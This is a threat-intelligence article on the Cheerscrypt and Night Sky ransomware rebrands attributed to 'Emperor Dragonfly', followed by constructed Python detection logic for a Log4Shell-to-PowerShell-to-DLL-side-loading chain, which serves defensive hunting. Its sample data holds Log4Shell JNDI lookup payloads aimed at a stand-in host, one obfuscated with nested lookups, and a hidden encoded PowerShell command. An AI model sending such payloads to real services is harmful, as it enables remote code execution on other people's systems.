On Monday, 3 October 2022, the cyber security company Sygnia published an article stating that it had investigated a Cheerscrypt ransomware attack which used Night Sky ransomware TTPs. On further analysis, it concluded that Cheerscrypt and Night Sky are both rebrands by the same threat group, dubbed ‘Emperor Dragonfly’.
The identified TTPs included the exploitation of the Apache Log4j ‘Log4Shell’ vulnerability (CVE-2021-44228) to execute PowerShell commands, which in turn initiated a DLL side-loading technique characteristic of the group, and the dropping of a Cobalt Strike beacon that connected to a C2 address previously associated with Night Sky operations.
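The chain above (a Log4Shell lookup string reaching a Java service, PowerShell spawned from that service, then a legitimate executable side-loading an unsigned DLL) is the kind of sequence a SOC can hunt for stage by stage. The following is an added example written for this page, not code from Sygnia or from the report it summarises. All log lines, process events and image-load events are constructed, and the event field names (host, parent, image, cmdline, image_signed, loaded, loaded_signed) are an assumption of this example rather than a real SIEM schema. It also goes slightly beyond the text by undoing the common nested-lookup obfuscations of the JNDI string before matching.

```python
"""Constructed detection logic for the Log4Shell -> PowerShell -> side-loaded
DLL chain described above. Sample data and field names are made up for this
example; nothing here is taken from the Sygnia report."""
import re

# --- Stage 1: Log4Shell (CVE-2021-44228) lookup strings in HTTP logs --------

# Log4j resolves nested lookups before the JNDI one, so attackers hide
# "${jndi:" behind ${lower:j}, ${upper:n}, ${::-j} and ${env:X:-j}.
# These two patterns collapse the common forms so a single check suffices.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

# Constructed access-log lines: two carry a JNDI lookup (the second one
# obfuscated with ${lower:...}), the third is benign.
SAMPLE_HTTP_LOGS = [
    '10.0.0.5 - - [03/Oct/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - [03/Oct/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
    '10.0.0.7 - - [03/Oct/2022:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def normalise_lookups(s: str, max_rounds: int = 16) -> str:
    """Collapse nested Log4j lookups until the string stops changing."""
    for _ in range(max_rounds):
        out = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        out = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), out)
        if out == s:
            break
        s = out
    return s


def find_jndi_lookups(lines):
    """Return (line_no, protocol, host) for every line carrying a JNDI lookup.
    The host is what you would compare against known C2 infrastructure."""
    hits = []
    for no, line in enumerate(lines, start=1):
        m = _JNDI.search(normalise_lookups(line))
        if m:
            hits.append((no, m.group(1).lower(), m.group(2)))
    return hits


# --- Stage 2: PowerShell spawned by the exploited Java service ---------------

JAVA_PARENTS = {"java.exe", "javaw.exe", "tomcat9.exe"}  # assumed parent names
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")

# Constructed process-creation events (Sysmon-like shape, assumed fields).
# The base64 in the first command line is a made-up placeholder.
SAMPLE_PROCESS_EVENTS = [
    {"host": "app01", "parent": "java.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"host": "ws05", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def flag_process_events(events):
    """Return (host, reason) for PowerShell launched by a Java process."""
    findings = []
    for ev in events:
        if ev["parent"].lower() in JAVA_PARENTS and ev["image"].lower() == "powershell.exe":
            reason = "powershell spawned by Java process"
            if ENCODED_FLAG.search(ev["cmdline"]):
                reason += " with encoded command"
            findings.append((ev["host"], reason))
    return findings


# --- Stage 3: DLL side-loading ----------------------------------------------

# Side-loading abuses a signed EXE that loads a DLL by name from its own
# directory; the tell is an unsigned DLL next to a signed EXE in a path
# a normal user can write to.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Constructed image-load events (assumed fields).
SAMPLE_IMAGE_LOADS = [
    {"host": "app01", "image": "C:\\Users\\Public\\Music\\vendor_tool.exe", "image_signed": True,
     "loaded": "C:\\Users\\Public\\Music\\version.dll", "loaded_signed": False},
    {"host": "app01", "image": "C:\\Program Files\\Vendor\\vendor_tool.exe", "image_signed": True,
     "loaded": "C:\\Windows\\System32\\version.dll", "loaded_signed": True},
]


def flag_image_loads(loads):
    """Return (host, reason) for a signed EXE loading an unsigned DLL from
    its own, user-writable directory."""
    findings = []
    for ld in loads:
        exe, dll = ld["image"].lower(), ld["loaded"].lower()
        same_dir = exe.rsplit("\\", 1)[0] == dll.rsplit("\\", 1)[0]
        if ld["image_signed"] and not ld["loaded_signed"] and same_dir and exe.startswith(USER_WRITABLE):
            findings.append((ld["host"], f"possible DLL side-load: {dll} into {exe}"))
    return findings


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_HTTP_LOGS):
        print("jndi lookup:", hit)
    for f in flag_process_events(SAMPLE_PROCESS_EVENTS) + flag_image_loads(SAMPLE_IMAGE_LOADS):
        print("finding:", f)
```

The three checks are deliberately independent: a hit on stage 1 alone is common noise from mass scanning, whereas a stage 1 hit whose host later shows stage 2 and stage 3 on the same machine is the sequence this article describes. The lookup normaliser only handles the ${lower:}, ${upper:} and default-value (${x:-y}) obfuscations; Log4j has further lookups that an attacker can nest, so treat this as a first-pass filter rather than an exhaustive decoder.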
In June 2022, both Secureworks and Microsoft reported that the ‘Emperor Dragonfly’ group had been observed using multiple ransomware families, such as Night Sky, Rook, Pandora and AtomSilo, to conduct government-sponsored cyber espionage under the guise of financially motivated attacks. Cheerscrypt is therefore believed to be another of Emperor Dragonfly’s continual payload rebrands, intended to evade attribution.
© 2021 CyberEnsō – Nihon Cyber Defence Co., Ltd. All Rights Reserved.